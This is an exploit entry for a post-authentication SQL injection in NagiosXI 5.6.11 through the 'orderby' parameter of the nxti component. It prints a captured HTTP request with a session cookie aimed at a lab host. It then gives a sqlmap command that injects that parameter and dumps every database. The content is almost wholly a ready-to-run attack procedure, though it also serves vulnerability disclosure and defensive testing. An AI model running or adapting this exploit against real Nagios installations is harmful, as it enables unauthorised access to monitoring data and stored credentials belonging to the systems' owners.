NagiosXL version 5.6.11 post authentication orderby parameter remote SQL injection exploit.
af00914d51be1605d7261a4e4640d262# Title: Postauth SQL injection in NagiosXI 5.6.11 (param: orderby)
# Date: 13.03.2020
# Vendor: https://www.nagios.com/
# Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/
# Repo: https://github.com/c610/free/
c@kali:~$ cat n2.txt
GET /nagiosxi/includes/components/nxti/index.php?&mode=recTable&page=asde&perpage=5&search=&orderby=trapdata_log_datetime&orderdir=DESC HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.1.10/nagiosxi/includes/components/nxti/index.php?event=asd&oid=asd&category=asd&severity=asd&desc=asd&format=&SNMPTW-integrate=on&SNMPTW%5Bhost%5D=asd&SNMPTW%5Bservice%5D=asd&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=asd&exec%5B%5D=&raw-data=&mode=save&tab=3&new=1
Cookie: nagiosxi=4usi1041slmu9064dfqfo9c502
c@kali:~$ sqlmap -r n2.txt -p orderby --random-agent --dbms=mysql --dump-all